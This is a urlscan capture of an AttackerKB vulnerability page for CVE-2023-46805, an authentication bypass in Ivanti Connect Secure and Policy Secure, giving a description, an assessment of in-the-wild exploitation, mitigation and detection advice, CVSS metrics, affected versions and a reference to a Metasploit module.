attackerkb.com
Open in
urlscan Pro
34.196.20.75
Public Scan
Submitted URL: https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805?referrer=notificationEmail#rapid7-analysis
Effective URL: https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805?referrer=notificationEmail
Submission Tags: demotag1 demotag2 Search All
Submission: On February 22 via api from RU — Scanned from DE
Effective URL: https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805?referrer=notificationEmail
Submission Tags: demotag1 demotag2 Search All
Submission: On February 22 via api from RU — Scanned from DE
Form analysis 3 forms found in the DOM
POST /search
<form action="/search" method="POST" id="search-condensed-form">
<input type="hidden" name="gorilla.csrf.Token" value="jTCpVsjofozPmL8CoDhEzZi19ll6kNPQs88UB8Zv9P9JAEteMoOQyHmJO6wMnyriixv2znyhoQhSP3JAlTh8Bw==">
<input class="form-control nav-search" type="search" name="search" placeholder="Search..." aria-label="Search">
<button class="pseudo-search-button" type="submit"></button>
</form>POST /search
<form id="search" class="form-inline" action="/search" method="POST">
<input type="hidden" name="gorilla.csrf.Token" value="jTCpVsjofozPmL8CoDhEzZi19ll6kNPQs88UB8Zv9P9JAEteMoOQyHmJO6wMnyriixv2znyhoQhSP3JAlTh8Bw==">
<input class="form-control nav-search" type="search" name="search" placeholder="Search..." aria-label="Search">
<button class="pseudo-search-button" type="submit"></button>
</form><form id="eitw-report-form" class="needs-validation" novalidate="">
<p class="report-exploited-description">AttackerKB users want to know this is information they can trust.<br> Help the community by indicating the source(s) of your knowledge:</p>
<ul>
<li>
<div class="form-check">
<input class="form-check-input eitw-checkbox" type="checkbox" value="" id="modal_vendorAdvisory">
<label class="form-check-label" for="modal_vendorAdvisory">Vendor Advisory</label>
</div>
<div class="add-reference collapse" id="modal_vendorAdvisoryReferenceCollapse">
<label class="" for="modal_vendorAdvisoryReference">Add a reference URL <span class="optional">(optional)</span>:</label>
<div class="add-reference-input">
<input type="text" id="modal_vendorAdvisoryReference" class="eitw-reference form-control" aria-describedby="vendorAdvisoryFeedback">
</div>
</div>
</li>
<li>
<div class="form-check">
<input class="form-check-input eitw-checkbox" type="checkbox" value="" id="modal_governmentAlert">
<label class="form-check-label" for="modal_governmentAlert">Government or Industry Alert</label>
</div>
<div class="add-reference collapse" id="modal_governmentAlertReferenceCollapse">
<label class="" for="modal_governmentAlertReference">Add a reference URL <span class="optional">(optional)</span>:</label>
<div class="add-reference-input">
<input type="text" id="modal_governmentAlertReference" class="eitw-reference form-control" aria-describedby="governmentAlertFeedback">
</div>
</div>
</li>
<li>
<div class="form-check">
<input class="form-check-input eitw-checkbox" type="checkbox" value="" id="modal_threatFeed">
<label class="form-check-label" for="modal_threatFeed">Threat Feed</label>
</div>
<div class="add-reference collapse" id="modal_threatFeedReferenceCollapse">
<label class="" for="modal_threatFeedReference">Add a reference URL <span class="optional">(optional)</span>:</label>
<div class="add-reference-input">
<input type="text" id="modal_threatFeedReference" class="eitw-reference form-control" aria-describedby="threatFeedFeedback">
</div>
</div>
</li>
<li>
<div class="form-check">
<input class="form-check-input eitw-checkbox" type="checkbox" value="" id="modal_news">
<label class="form-check-label" for="modal_news">News Article or Blog</label>
</div>
<div class="add-reference collapse" id="modal_newsReferenceCollapse">
<label class="" for="modal_newsReference">Add a reference URL <span class="optional">(optional)</span>:</label>
<div class="add-reference-input">
<input type="text" id="modal_newsReference" class="eitw-reference form-control" aria-describedby="newsFeedback">
</div>
</div>
</li>
<li>
<div class="form-check">
<input class="form-check-input eitw-checkbox" type="checkbox" value="" id="modal_personallyObserved">
<label class="form-check-label" for="modal_personallyObserved">Exploitation personally observed in an environment (client, customer, employer, or personal environment)</label>
</div>
<div class="add-reference collapse" id="modal_personallyObservedReferenceCollapse">
<label class="" for="modal_personallyObservedReference">Add a reference URL <span class="optional">(optional)</span>:</label>
<div class="add-reference-input">
<input type="text" id="modal_personallyObservedReference" class="eitw-reference form-control" aria-describedby="personallyObservedFeedback">
</div>
</div>
</li>
<li>
<div class="eitw-other-input-group form-check">
<input class="form-check-input eitw-checkbox" type="checkbox" value="" id="modal_eitwOther">
<label class="form-check-label" for="modal_eitwOther">Other:</label>
<div class="eitw-other-input">
<input type="text" id="modal_eitwOtherInput" class="eitw-required form-control" aria-describedby="eitwOtherInputFeedback" disabled="">
<div id="modal_eitwOtherInputFeedback" class="invalid-feedback"> Please explain the source of your report. </div>
</div>
</div>
<div class="add-reference collapse" id="modal_eitwOtherReferenceCollapse">
<label class="" for="modal_eitwOtherReference">Add a reference URL <span class="optional">(optional)</span>:</label>
<div class="add-reference-input">
<input type="text" id="modal_eitwOtherReference" class="eitw-reference form-control" aria-describedby="eitwOtherReferenceFeedback">
</div>
</div>
</li>
</ul>
</form>Text Content
A Rapid7 Project
* Activity Feed
* Topics
* About
* Leaderboard
*
Log In
Attacker Value
VERY HIGH
6
CVE-2023-46805
6
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references
from the CVE list and the National Vulnerability Database. If available, please
supply below:
CVE ID:
ADD REFERENCES:
ADVISORY
Description: URL:
Add Another
EXPLOIT
Description: URL:
Add Another
MITIGATION
Description: URL:
Add Another
RELATED ATTACKERKB TOPIC
Description: URL:
Add Another
MISCELLANEOUS
Description: URL:
Add Another
Cancel Submit
Attacker Value
VERY HIGH
(1 user assessed)
Exploitability
MODERATE
(1 user assessed)
User Interaction
NONE
Privileges Required
NONE
Attack Vector
NETWORK
6
CVE-2023-46805
Disclosure Date: January 12, 2024 •
(Last updated January 16, 2024) ▾
CVE-2023-46805 CVSS v3 Base Score: 8.2
Exploited in the Wild
Reported by cbeek-r7 and 2 more...
View Source Details
Report As Exploited in the Wild
MITRE ATT&CK Log in to add MITRE ATT&CK tag
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
MITRE ATT&CK
Select the MITRE ATT&CK Tactics that apply to this CVE
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential
AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlImpact
COLLECTION
Select any Techniques used:
Data from Local System
Data from Removable Media
Data from Network Shared Drive
Input Capture
Input Capture: Keylogging
Input Capture: GUI Input Capture
Input Capture: Web Portal Capture
Input Capture: Credential API Hooking
Data Staged
Data Staged: Local Data Staging
Data Staged: Remote Data Staging
Screen Capture
Email Collection
Email Collection: Local Email Collection
Email Collection: Remote Email Collection
Email Collection: Email Forwarding Rule
Clipboard Data
Automated Collection
Audio Capture
Video Capture
Man in the Browser
Data from Information Repositories
Data from Information Repositories: Confluence
Data from Information Repositories: Sharepoint
Data from Cloud Storage Object
Man-in-the-Middle
Man-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay
Archive Collected Data
Archive Collected Data: Archive via Utility
Archive Collected Data: Archive via Library
Archive Collected Data: Archive via Custom Method
COMMAND AND CONTROL
Select any Techniques used:
Data Obfuscation
Data Obfuscation: Junk Data
Data Obfuscation: Steganography
Data Obfuscation: Protocol Impersonation
Fallback Channels
Application Layer Protocol
Application Layer Protocol: Web Protocols
Application Layer Protocol: File Transfer Protocols
Application Layer Protocol: Mail Protocols
Application Layer Protocol: DNS
Proxy
Proxy: Internal Proxy
Proxy: External Proxy
Proxy: Multi-hop Proxy
Proxy: Domain Fronting
Communication Through Removable Media
Non-Application Layer Protocol
Web Service
Web Service: Dead Drop Resolver
Web Service: Bidirectional Communication
Web Service: One-Way Communication
Multi-Stage Channels
Ingress Tool Transfer
Data Encoding
Data Encoding: Standard Encoding
Data Encoding: Non-Standard Encoding
Traffic Signaling
Traffic Signaling: Port Knocking
Remote Access Software
Dynamic Resolution
Dynamic Resolution: Fast Flux DNS
Dynamic Resolution: Domain Generation Algorithms
Dynamic Resolution: DNS Calculation
Non-Standard Port
Protocol Tunneling
Encrypted Channel
Encrypted Channel: Symmetric Cryptography
Encrypted Channel: Asymmetric Cryptography
CREDENTIAL ACCESS
Select any Techniques used:
OS Credential Dumping
OS Credential Dumping: LSASS Memory
OS Credential Dumping: Security Account Manager
OS Credential Dumping: NTDS
OS Credential Dumping: LSA Secrets
OS Credential Dumping: Cached Domain Credentials
OS Credential Dumping: DCSync
OS Credential Dumping: Proc Filesystem
OS Credential Dumping: /etc/passwd and /etc/shadow
Network Sniffing
Input Capture
Input Capture: Keylogging
Input Capture: GUI Input Capture
Input Capture: Web Portal Capture
Input Capture: Credential API Hooking
Brute Force
Brute Force: Password Guessing
Brute Force: Password Cracking
Brute Force: Password Spraying
Brute Force: Credential Stuffing
Two-Factor Authentication Interception
Forced Authentication
Exploitation for Credential Access
Steal Application Access Token
Steal Web Session Cookie
Unsecured Credentials
Unsecured Credentials: Credentials In Files
Unsecured Credentials: Credentials in Registry
Unsecured Credentials: Bash History
Unsecured Credentials: Private Keys
Unsecured Credentials: Cloud Instance Metadata API
Unsecured Credentials: Group Policy Preferences
Credentials from Password Stores
Credentials from Password Stores: Keychain
Credentials from Password Stores: Securityd Memory
Credentials from Password Stores: Credentials from Web Browsers
Modify Authentication Process
Modify Authentication Process: Domain Controller Authentication
Modify Authentication Process: Password Filter DLL
Modify Authentication Process: Pluggable Authentication Modules
Man-in-the-Middle
Man-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay
Steal or Forge Kerberos Tickets
Steal or Forge Kerberos Tickets: Golden Ticket
Steal or Forge Kerberos Tickets: Silver Ticket
Steal or Forge Kerberos Tickets: Kerberoasting
DEFENSE EVASION
Select any Techniques used:
Direct Volume Access
Rootkit
Obfuscated Files or Information
Obfuscated Files or Information: Binary Padding
Obfuscated Files or Information: Software Packing
Obfuscated Files or Information: Steganography
Obfuscated Files or Information: Compile After Delivery
Obfuscated Files or Information: Indicator Removal from Tools
Masquerading
Masquerading: Invalid Code Signature
Masquerading: Right-to-Left Override
Masquerading: Rename System Utilities
Masquerading: Masquerade Task or Service
Masquerading: Match Legitimate Name or Location
Masquerading: Space after Filename
Process Injection
Process Injection: Dynamic-link Library Injection
Process Injection: Portable Executable Injection
Process Injection: Thread Execution Hijacking
Process Injection: Asynchronous Procedure Call
Process Injection: Thread Local Storage
Process Injection: Ptrace System Calls
Process Injection: Proc Memory
Process Injection: Extra Window Memory Injection
Process Injection: Process Hollowing
Process Injection: Process Doppelgänging
Process Injection: VDSO Hijacking
Indicator Removal on Host
Indicator Removal on Host: Clear Windows Event Logs
Indicator Removal on Host: Clear Linux or Mac System Logs
Indicator Removal on Host: Clear Command History
Indicator Removal on Host: File Deletion
Indicator Removal on Host: Network Share Connection Removal
Indicator Removal on Host: Timestomp
Valid Accounts
Valid Accounts: Default Accounts
Valid Accounts: Domain Accounts
Valid Accounts: Local Accounts
Valid Accounts: Cloud Accounts
Modify Registry
Trusted Developer Utilities Proxy Execution
Trusted Developer Utilities Proxy Execution: MSBuild
Access Token Manipulation
Access Token Manipulation: Token Impersonation/Theft
Access Token Manipulation: Create Process with Token
Access Token Manipulation: Make and Impersonate Token
Access Token Manipulation: Parent PID Spoofing
Access Token Manipulation: SID-History Injection
Deobfuscate/Decode Files or Information
BITS Jobs
Indirect Command Execution
Traffic Signaling
Traffic Signaling: Port Knocking
Rogue Domain Controller
Exploitation for Defense Evasion
Signed Script Proxy Execution
Signed Script Proxy Execution: PubPrn
Signed Binary Proxy Execution
Signed Binary Proxy Execution: Compiled HTML File
Signed Binary Proxy Execution: Control Panel
Signed Binary Proxy Execution: CMSTP
Signed Binary Proxy Execution: InstallUtil
Signed Binary Proxy Execution: Mshta
Signed Binary Proxy Execution: Msiexec
Signed Binary Proxy Execution: Odbcconf
Signed Binary Proxy Execution: Regsvcs/Regasm
Signed Binary Proxy Execution: Regsvr32
Signed Binary Proxy Execution: Rundll32
XSL Script Processing
Template Injection
File and Directory Permissions Modification
File and Directory Permissions Modification: Windows File and Directory
Permissions Modification
File and Directory Permissions Modification: Linux and Mac File and Directory
Permissions Modification
Execution Guardrails
Execution Guardrails: Environmental Keying
Group Policy Modification
Virtualization/Sandbox Evasion
Virtualization/Sandbox Evasion: System Checks
Virtualization/Sandbox Evasion: User Activity Based Checks
Virtualization/Sandbox Evasion: Time Based Evasion
Unused/Unsupported Cloud Regions
Pre-OS Boot
Pre-OS Boot: System Firmware
Pre-OS Boot: Component Firmware
Pre-OS Boot: Bootkit
Abuse Elevation Control Mechanism
Abuse Elevation Control Mechanism: Setuid and Setgid
Abuse Elevation Control Mechanism: Bypass User Access Control
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Abuse Elevation Control Mechanism: Elevated Execution with Prompt
Use Alternate Authentication Material
Use Alternate Authentication Material: Application Access Token
Use Alternate Authentication Material: Pass the Hash
Use Alternate Authentication Material: Pass the Ticket
Use Alternate Authentication Material: Web Session Cookie
Subvert Trust Controls
Subvert Trust Controls: Gatekeeper Bypass
Subvert Trust Controls: Code Signing
Subvert Trust Controls: SIP and Trust Provider Hijacking
Subvert Trust Controls: Install Root Certificate
Modify Authentication Process
Modify Authentication Process: Domain Controller Authentication
Modify Authentication Process: Password Filter DLL
Modify Authentication Process: Pluggable Authentication Modules
Impair Defenses
Impair Defenses: Disable or Modify Tools
Impair Defenses: Disable Windows Event Logging
Impair Defenses: HISTCONTROL
Impair Defenses: Disable or Modify System Firewall
Impair Defenses: Indicator Blocking
Impair Defenses: Disable or Modify Cloud Firewall
Hide Artifacts
Hide Artifacts: Hidden Files and Directories
Hide Artifacts: Hidden Users
Hide Artifacts: Hidden Window
Hide Artifacts: NTFS File Attributes
Hide Artifacts: Hidden File System
Hide Artifacts: Run Virtual Instance
Hijack Execution Flow
Hijack Execution Flow: DLL Search Order Hijacking
Hijack Execution Flow: DLL Side-Loading
Hijack Execution Flow: Dylib Hijacking
Hijack Execution Flow: Executable Installer File Permissions Weakness
Hijack Execution Flow: LD_PRELOAD
Hijack Execution Flow: Path Interception by PATH Environment Variable
Hijack Execution Flow: Path Interception by Search Order Hijacking
Hijack Execution Flow: Path Interception by Unquoted Path
Hijack Execution Flow: Services File Permissions Weakness
Hijack Execution Flow: Services Registry Permissions Weakness
Hijack Execution Flow: COR_PROFILER
Modify Cloud Compute Infrastructure
Modify Cloud Compute Infrastructure: Create Snapshot
Modify Cloud Compute Infrastructure: Create Cloud Instance
Modify Cloud Compute Infrastructure: Delete Cloud Instance
Modify Cloud Compute Infrastructure: Revert Cloud Instance
DISCOVERY
Select any Techniques used:
System Service Discovery
Application Window Discovery
Query Registry
System Network Configuration Discovery
Remote System Discovery
System Owner/User Discovery
Network Sniffing
Network Service Scanning
System Network Connections Discovery
Process Discovery
Permission Groups Discovery
Permission Groups Discovery: Local Groups
Permission Groups Discovery: Domain Groups
Permission Groups Discovery: Cloud Groups
System Information Discovery
File and Directory Discovery
Account Discovery
Account Discovery: Local Account
Account Discovery: Domain Account
Account Discovery: Email Account
Account Discovery: Cloud Account
Peripheral Device Discovery
System Time Discovery
Network Share Discovery
Password Policy Discovery
Browser Bookmark Discovery
Domain Trust Discovery
Virtualization/Sandbox Evasion
Virtualization/Sandbox Evasion: System Checks
Virtualization/Sandbox Evasion: User Activity Based Checks
Virtualization/Sandbox Evasion: Time Based Evasion
Software Discovery
Software Discovery: Security Software Discovery
Cloud Service Discovery
Cloud Service Dashboard
EXECUTION
Select any Techniques used:
Windows Management Instrumentation
Scheduled Task/Job
Scheduled Task/Job: At (Linux)
Scheduled Task/Job: At (Windows)
Scheduled Task/Job: Cron
Scheduled Task/Job: Launchd
Scheduled Task/Job: Scheduled Task
Command and Scripting Interpreter
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: AppleScript
Command and Scripting Interpreter: Windows Command Shell
Command and Scripting Interpreter: Unix Shell
Command and Scripting Interpreter: Visual Basic
Command and Scripting Interpreter: Python
Command and Scripting Interpreter: JavaScript/JScript
Software Deployment Tools
Native API
Shared Modules
Exploitation for Client Execution
User Execution
User Execution: Malicious Link
User Execution: Malicious File
Inter-Process Communication
Inter-Process Communication: Component Object Model
Inter-Process Communication: Dynamic Data Exchange
System Services
System Services: Launchctl
System Services: Service Execution
EXFILTRATION
Select any Techniques used:
Exfiltration Over Other Network Medium
Exfiltration Over Other Network Medium: Exfiltration Over Bluetooth
Automated Exfiltration
Scheduled Transfer
Data Transfer Size Limits
Exfiltration Over C2 Channel
Exfiltration Over Alternative Protocol
Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted
Non-C2 Protocol
Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted
Non-C2 Protocol
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
Non-C2 Protocol
Exfiltration Over Physical Medium
Exfiltration Over Physical Medium: Exfiltration over USB
Transfer Data to Cloud Account
Exfiltration Over Web Service
Exfiltration Over Web Service: Exfiltration to Code Repository
Exfiltration Over Web Service: Exfiltration to Cloud Storage
IMPACT
Select any Techniques used:
Data Destruction
Data Encrypted for Impact
Service Stop
Inhibit System Recovery
Defacement
Defacement: Internal Defacement
Defacement: External Defacement
Firmware Corruption
Resource Hijacking
Network Denial of Service
Network Denial of Service: Direct Network Flood
Network Denial of Service: Reflection Amplification
Endpoint Denial of Service
Endpoint Denial of Service: OS Exhaustion Flood
Endpoint Denial of Service: Service Exhaustion Flood
Endpoint Denial of Service: Application Exhaustion Flood
Endpoint Denial of Service: Application or System Exploitation
System Shutdown/Reboot
Account Access Removal
Disk Wipe
Disk Wipe: Disk Content Wipe
Disk Wipe: Disk Structure Wipe
Data Manipulation
Data Manipulation: Stored Data Manipulation
Data Manipulation: Transmitted Data Manipulation
Data Manipulation: Runtime Data Manipulation
INITIAL ACCESS
Select any Techniques used:
Valid Accounts
Valid Accounts: Default Accounts
Valid Accounts: Domain Accounts
Valid Accounts: Local Accounts
Valid Accounts: Cloud Accounts
Replication Through Removable Media
External Remote Services
Drive-by Compromise
Exploit Public-Facing Application
Supply Chain Compromise
Supply Chain Compromise: Compromise Software Dependencies and Development Tools
Supply Chain Compromise: Compromise Software Supply Chain
Supply Chain Compromise: Compromise Hardware Supply Chain
Trusted Relationship
Hardware Additions
Phishing
Phishing: Spearphishing Attachment
Phishing: Spearphishing Link
Phishing: Spearphishing via Service
LATERAL MOVEMENT
Select any Techniques used:
Remote Services
Remote Services: Remote Desktop Protocol
Remote Services: SMB/Windows Admin Shares
Remote Services: Distributed Component Object Model
Remote Services: SSH
Remote Services: VNC
Remote Services: Windows Remote Management
Software Deployment Tools
Taint Shared Content
Replication Through Removable Media
Exploitation of Remote Services
Internal Spearphishing
Use Alternate Authentication Material
Use Alternate Authentication Material: Application Access Token
Use Alternate Authentication Material: Pass the Hash
Use Alternate Authentication Material: Pass the Ticket
Use Alternate Authentication Material: Web Session Cookie
Remote Service Session Hijacking
Remote Service Session Hijacking: SSH Hijacking
Remote Service Session Hijacking: RDP Hijacking
Lateral Tool Transfer
PERSISTENCE
Select any Techniques used:
Boot or Logon Initialization Scripts
Boot or Logon Initialization Scripts: Logon Script (Windows)
Boot or Logon Initialization Scripts: Logon Script (Mac)
Boot or Logon Initialization Scripts: Network Logon Script
Boot or Logon Initialization Scripts: Rc.common
Boot or Logon Initialization Scripts: Startup Items
Scheduled Task/Job
Scheduled Task/Job: At (Linux)
Scheduled Task/Job: At (Windows)
Scheduled Task/Job: Cron
Scheduled Task/Job: Launchd
Scheduled Task/Job: Scheduled Task
Valid Accounts
Valid Accounts: Default Accounts
Valid Accounts: Domain Accounts
Valid Accounts: Local Accounts
Valid Accounts: Cloud Accounts
Account Manipulation
Account Manipulation: Additional Azure Service Principal Credentials
Account Manipulation: Exchange Email Delegate Permissions
Account Manipulation: Add Office 365 Global Administrator Role
Account Manipulation: SSH Authorized Keys
External Remote Services
Create Account
Create Account: Local Account
Create Account: Domain Account
Create Account: Cloud Account
Office Application Startup
Office Application Startup: Office Template Macros
Office Application Startup: Office Test
Office Application Startup: Outlook Forms
Office Application Startup: Outlook Home Page
Office Application Startup: Outlook Rules
Office Application Startup: Add-ins
Browser Extensions
BITS Jobs
Traffic Signaling
Traffic Signaling: Port Knocking
Server Software Component
Server Software Component: SQL Stored Procedures
Server Software Component: Transport Agent
Server Software Component: Web Shell
Implant Container Image
Pre-OS Boot
Pre-OS Boot: System Firmware
Pre-OS Boot: Component Firmware
Pre-OS Boot: Bootkit
Create or Modify System Process
Create or Modify System Process: Launch Agent
Create or Modify System Process: Systemd Service
Create or Modify System Process: Windows Service
Create or Modify System Process: Launch Daemon
Event Triggered Execution
Event Triggered Execution: Change Default File Association
Event Triggered Execution: Screensaver
Event Triggered Execution: Windows Management Instrumentation Event Subscription
Event Triggered Execution: .bash_profile and .bashrc
Event Triggered Execution: Trap
Event Triggered Execution: LC_LOAD_DYLIB Addition
Event Triggered Execution: Netsh Helper DLL
Event Triggered Execution: Accessibility Features
Event Triggered Execution: AppCert DLLs
Event Triggered Execution: AppInit DLLs
Event Triggered Execution: Application Shimming
Event Triggered Execution: Image File Execution Options Injection
Event Triggered Execution: PowerShell Profile
Event Triggered Execution: Emond
Event Triggered Execution: Component Object Model Hijacking
Boot or Logon Autostart Execution
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Boot or Logon Autostart Execution: Authentication Package
Boot or Logon Autostart Execution: Time Providers
Boot or Logon Autostart Execution: Winlogon Helper DLL
Boot or Logon Autostart Execution: Security Support Provider
Boot or Logon Autostart Execution: Kernel Modules and Extensions
Boot or Logon Autostart Execution: Re-opened Applications
Boot or Logon Autostart Execution: LSASS Driver
Boot or Logon Autostart Execution: Shortcut Modification
Boot or Logon Autostart Execution: Port Monitors
Boot or Logon Autostart Execution: Plist Modification
Compromise Client Software Binary
Hijack Execution Flow
Hijack Execution Flow: DLL Search Order Hijacking
Hijack Execution Flow: DLL Side-Loading
Hijack Execution Flow: Dylib Hijacking
Hijack Execution Flow: Executable Installer File Permissions Weakness
Hijack Execution Flow: LD_PRELOAD
Hijack Execution Flow: Path Interception by PATH Environment Variable
Hijack Execution Flow: Path Interception by Search Order Hijacking
Hijack Execution Flow: Path Interception by Unquoted Path
Hijack Execution Flow: Services File Permissions Weakness
Hijack Execution Flow: Services Registry Permissions Weakness
Hijack Execution Flow: COR_PROFILER
PRIVILEGE ESCALATION
Select any Techniques used:
Boot or Logon Initialization Scripts
Boot or Logon Initialization Scripts: Logon Script (Windows)
Boot or Logon Initialization Scripts: Logon Script (Mac)
Boot or Logon Initialization Scripts: Network Logon Script
Boot or Logon Initialization Scripts: Rc.common
Boot or Logon Initialization Scripts: Startup Items
Scheduled Task/Job
Scheduled Task/Job: At (Linux)
Scheduled Task/Job: At (Windows)
Scheduled Task/Job: Cron
Scheduled Task/Job: Launchd
Scheduled Task/Job: Scheduled Task
Process Injection
Process Injection: Dynamic-link Library Injection
Process Injection: Portable Executable Injection
Process Injection: Thread Execution Hijacking
Process Injection: Asynchronous Procedure Call
Process Injection: Thread Local Storage
Process Injection: Ptrace System Calls
Process Injection: Proc Memory
Process Injection: Extra Window Memory Injection
Process Injection: Process Hollowing
Process Injection: Process Doppelgänging
Process Injection: VDSO Hijacking
Exploitation for Privilege Escalation
Valid Accounts
Valid Accounts: Default Accounts
Valid Accounts: Domain Accounts
Valid Accounts: Local Accounts
Valid Accounts: Cloud Accounts
Access Token Manipulation
Access Token Manipulation: Token Impersonation/Theft
Access Token Manipulation: Create Process with Token
Access Token Manipulation: Make and Impersonate Token
Access Token Manipulation: Parent PID Spoofing
Access Token Manipulation: SID-History Injection
Group Policy Modification
Create or Modify System Process
Create or Modify System Process: Launch Agent
Create or Modify System Process: Systemd Service
Create or Modify System Process: Windows Service
Create or Modify System Process: Launch Daemon
Event Triggered Execution
Event Triggered Execution: Change Default File Association
Event Triggered Execution: Screensaver
Event Triggered Execution: Windows Management Instrumentation Event Subscription
Event Triggered Execution: .bash_profile and .bashrc
Event Triggered Execution: Trap
Event Triggered Execution: LC_LOAD_DYLIB Addition
Event Triggered Execution: Netsh Helper DLL
Event Triggered Execution: Accessibility Features
Event Triggered Execution: AppCert DLLs
Event Triggered Execution: AppInit DLLs
Event Triggered Execution: Application Shimming
Event Triggered Execution: Image File Execution Options Injection
Event Triggered Execution: PowerShell Profile
Event Triggered Execution: Emond
Event Triggered Execution: Component Object Model Hijacking
Boot or Logon Autostart Execution
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Boot or Logon Autostart Execution: Authentication Package
Boot or Logon Autostart Execution: Time Providers
Boot or Logon Autostart Execution: Winlogon Helper DLL
Boot or Logon Autostart Execution: Security Support Provider
Boot or Logon Autostart Execution: Kernel Modules and Extensions
Boot or Logon Autostart Execution: Re-opened Applications
Boot or Logon Autostart Execution: LSASS Driver
Boot or Logon Autostart Execution: Shortcut Modification
Boot or Logon Autostart Execution: Port Monitors
Boot or Logon Autostart Execution: Plist Modification
Abuse Elevation Control Mechanism
Abuse Elevation Control Mechanism: Setuid and Setgid
Abuse Elevation Control Mechanism: Bypass User Access Control
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Abuse Elevation Control Mechanism: Elevated Execution with Prompt
Hijack Execution Flow
Hijack Execution Flow: DLL Search Order Hijacking
Hijack Execution Flow: DLL Side-Loading
Hijack Execution Flow: Dylib Hijacking
Hijack Execution Flow: Executable Installer File Permissions Weakness
Hijack Execution Flow: LD_PRELOAD
Hijack Execution Flow: Path Interception by PATH Environment Variable
Hijack Execution Flow: Path Interception by Search Order Hijacking
Hijack Execution Flow: Path Interception by Unquoted Path
Hijack Execution Flow: Services File Permissions Weakness
Hijack Execution Flow: Services Registry Permissions Weakness
Hijack Execution Flow: COR_PROFILER
Submit
Metasploit Module
exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805
CISA KEV ListedCommon in enterpriseGives privileged accessObserved in nation
state sponsored attacksUnauthenticatedVulnerable in default configuration
TOPIC TAGS
Select the tags that apply to this CVE (Assessment added tags are disabled and
cannot be removed)
What makes this of high-value to an attacker?
Vulnerable in default configuration
Unauthenticated
Observed in ransomware attacks
Observed in nation state sponsored attacks
Gives privileged access
Easy to weaponize
Difficult to patch
Common in enterprise
CISA KEV Listed
What makes this of low-value to an attacker?
Vulnerable in uncommon configuration
Requires user interaction
Requires physical access
Requires elevated access
No useful access
Difficult to weaponize
Authenticated
Submit
DESCRIPTION
An authentication bypass vulnerability in the web component of Ivanti ICS 9.x,
22.x and Ivanti Policy Secure allows a remote attacker to access restricted
resources by bypassing control checks.
See More See Less
* Ratings & Analysis
* Vulnerability Details
* Analysis
ADD ASSESSMENT
Log in to add an Assessment
2
cbeek-r7 (94)
January 11, 2024 10:43am UTC (1 month ago)•
Edited 1 month ago ▾
RATINGS
Attacker Value
Very High
Exploitability
Medium
CISA KEV ListedCommon in enterpriseGives privileged accessObserved in nation
state sponsored attacksUnauthenticatedVulnerable in default configuration
TECHNICAL ANALYSIS
CVE-2023-46805 is an authentication bypass vulnerability found in the web
component of Ivanti Connect Secure (ICS), which was previously known as Pulse
Connect Secure and Ivanti Policy Secure. This vulnerability affects all
supported versions of Ivanti ICS and Policy Secure 9.x and 22.x.
Details of CVE-2023-46805:
* The vulnerability allows an attacker to bypass control checks and access
restricted resources.
* It was exploited in the wild in a chained attack for unauthenticated remote
code execution (RCE) as early as December 2023.
* According to Volexity, a cybersecurity firm, the zero-day exploitation of
these flaws was attributed to UTA0178, believed to be a Chinese nation-state
level threat actor.
* The attackers deployed webshells, including GLASSTOKEN, on both
internet-facing and internal assets to maintain persistence on a network
after compromise.
Mitigation and Updates:
* As of the latest information, Ivanti has not released a patch for this
vulnerability. However, they provided a mitigation script that should be used
immediately.
* Ivanti announced that patches for this vulnerability would be released in a
staggered schedule, with the first version targeted to be available in the
week of 22 January 2024 and the final version by the week of 19 February
2024.
* Users and administrators of affected product versions are advised to apply
mitigation measures provided by Ivanti.
Impact and Detection:
* Attackers modified legitimate components of Ivanti Connect Secure, such as
compcheck.cgi and lastauthserverused.js, to support execution of remote
commands and credential theft.
* Organizations can detect potential compromise through network traffic
analysis, VPN device log analysis, and execution of the Integrity Checker
Tool.
Recommendation:
* It is crucial for users and administrators to apply the current workarounds
immediately and to update the systems once patches are released.
* Monitoring for signs of compromise is recommended, including examining
network traffic and VPN device logs.
WOULD YOU ALSO LIKE TO DELETE YOUR EXPLOITED IN THE WILD REPORT?
Delete Assessment Only Delete Assessment and Exploited in the Wild Report
Log in to Add Reply
See MoreSee Less
CVSS V3 SEVERITY AND METRICS
Data provided by the National Vulnerability Database (NVD)
Base Score:
8.2 High
Impact Score:
4.2
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
Low
Availability (A):
None
GENERAL INFORMATION
Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
ICS 9.1R18
ICS 22.6R2
IPS 9.1R18
IPS 22.6R1
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown
VENDORS
* ivanti
PRODUCTS
* connect secure 22.1,
* connect secure 22.2,
* connect secure 22.3,
* connect secure 22.4,
* connect secure 22.5,
* connect secure 22.6,
* connect secure 9.0,
* connect secure 9.1,
* policy secure 22.1,
* policy secure 22.2,
* policy secure 22.3,
* policy secure 22.4,
* policy secure 22.5,
* policy secure 22.6,
* policy secure 9.0,
* policy secure 9.1
METASPLOIT MODULES
exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805
(https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb)
EXPLOITED IN THE WILD
Reported by:
cbeek-r7 indicated source as Government or Industry Alert
